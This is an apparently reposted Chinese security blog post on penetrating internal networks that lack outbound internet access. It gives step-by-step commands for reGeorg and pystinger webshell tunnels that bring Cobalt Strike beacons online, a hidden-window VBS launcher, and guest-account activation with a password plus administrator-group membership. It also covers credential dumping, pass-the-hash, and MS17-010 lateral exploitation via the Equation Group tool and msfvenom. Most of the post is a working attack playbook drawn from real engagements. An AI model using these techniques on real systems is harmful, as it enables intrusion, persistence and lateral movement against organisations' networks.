内网渗透:不出网渗透技巧 – 作者:诺言

前言

最近打了几场**,遇到几个内网环境都不通外网,整理下用到的几种不出网内网渗透技巧。

socks隧道搭建

常用工具:reGeorg,Proxifier

用的比较多的一个隧道代理工具

1、上传对应语言的脚本到目标服务器的网站目录下

图片[1]-内网渗透:不出网渗透技巧 – 作者:诺言-安全小百科

2、通过浏览器访问上传的脚本文件,显示如下表示成功。

图片[2]-内网渗透:不出网渗透技巧 – 作者:诺言-安全小百科

3、本地运行reGeorgSocksProxy.py,-p为指定隧道的端口,-u为刚刚上传的tunnel文件地址。

python reGeorgSocksProxy.py -p 8888 -u http://x.x.x.x/tunnel.php

1598257485.png!small

5、成功把本机带入内网。

1598257491.png!small

cs上线

cs逐渐成为内网渗透中使用最多的工具,在目标不通外网的情况下,无法直接与公网的cs服务端建立连接。

pystinger

下载地址:https://github.com/FunnyWolf/pystinger
通过webshell实现内网SOCK4代理,端口映射可以使目标不出网情况下在cs上线。

图片[5]-内网渗透:不出网渗透技巧 – 作者:诺言-安全小百科

直接使用cs多主机上线方法。
首先上传对应语言的脚本到网站目录下。

图片[6]-内网渗透:不出网渗透技巧 – 作者:诺言-安全小百科

将stinger_server.exe上传到目标服务器
创建stinger_server.vbs文件,示例如下:

Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c D:\XXXXX\stinger_server.exe 0.0.0.0",vbhide

图片[7]-内网渗透:不出网渗透技巧 – 作者:诺言-安全小百科图片[8]-内网渗透:不出网渗透技巧 – 作者:诺言-安全小百科

把stinger_client上传到公网vps,-w指定proxy的url地址运行。

chmod 777 stinger_client
./stinger_client -w http://x.x.x.x/proxy.jsp -l 0.0.0.0 -p 60000

1598257510.png!small

1598257516.png!small

1598257524.png!small

1598257533.png!small

抓取上线的主机密码。

1598257545.png!small

对内网其它主机进行pth攻击,选择刚才建立的监听器。

图片[14]-内网渗透:不出网渗透技巧 – 作者:诺言-安全小百科

目标主机成功上线。

1598257558.png!small

坑点:使用过程中cs会话可能假死掉,需要把stinger_server.exe进程结束掉,然后重新启动。

在目标内网搭建cs服务端

如果拿下了目标主机的管理员权限,可以激活guest用户,建立基于http的socks隧道,登录远程桌面,在目标内网搭建cs服务端。
缺点:被发现概率上升;需要安装java环境;基于web的socks隧道速度很慢,心态容易蹦。
首先激活guest用户

net user guest   /active:yes
net user guest   1q2w3e4r@
net localgroup   administrators  guest   /add
图片[16]-内网渗透:不出网渗透技巧 – 作者:诺言-安全小百科

上传cs4.0到目标服务器。

图片[17]-内网渗透:不出网渗透技巧 – 作者:诺言-安全小百科

运行服务端

teamserver.bat x.x.x.x 1q2w3e4r
图片[18]-内网渗透:不出网渗透技巧 – 作者:诺言-安全小百科

点击cs.bat运行客户端

1598257804.png!small

然后就可以直接在内网操作cs了。

图片[20]-内网渗透:不出网渗透技巧 – 作者:诺言-安全小百科

ms17010横向利用

内网渗透中常用的攻击手段,随着补丁和杀软的普及,能利用的场景越来越少,而且容易造成目标蓝屏,影响业务,所以谨慎使用。
之前的利用都是在通外网下情况下利用msf攻击。
本次在目标不出网的情况下进行利用。

方程式漏洞利用工具

1598257604.png!small

生成对应监听器的bin文件。

图片[22]-内网渗透:不出网渗透技巧 – 作者:诺言-安全小百科

使用msf把cs生成的bin文件转化为方程式利用工具可以使用的dll文件。

msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x64 --platform windows -f dll -o x64.dll

图片[23]-内网渗透:不出网渗透技巧 – 作者:诺言-安全小百科

把原来的x64.dll文件替换掉,把工具上传到目标主机上。
设置targetip为存在漏洞的主机ip,设置系统类型,点击attack执行利用工具,利用成功返回success。

图片[24]-内网渗透:不出网渗透技巧 – 作者:诺言-安全小百科

选择doublepulsar模块,配置ip选择位数,默认加载dll,点击attack在攻击主机执行刚刚生成的x64.dll文件。

图片[25]-内网渗透:不出网渗透技巧 – 作者:诺言-安全小百科

目标在cs上线成功。

1598257627.png!small

cs永恒之蓝利用插件

下载地址:https://github.com/phink-team/Cobaltstrike-MS17-010
cs安装下载的插件,导入aggressor.cna文件。
使用pystinger多主机模式使内网主机在cs上线,生成对应的内网监听器test。

1598257633.png!small

内网主机上线后,右键使用ms17-010攻击插件。

1598257781.png!small

ip配置为存在漏洞的主机ip,监听器选择test,次数更改为1次,降低蓝屏风险。

1598257664.png!small

成功通过ms17-010攻击其它主机,cs上线成功。

图片[30]-内网渗透:不出网渗透技巧 – 作者:诺言-安全小百科1598257673.png!small

总结

本次列举了最近实战用到的几个小技巧,技术含量不高,希望能帮到大家。

来源:freebuf.com 2020-08-20 10:10:12 by: 诺言

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论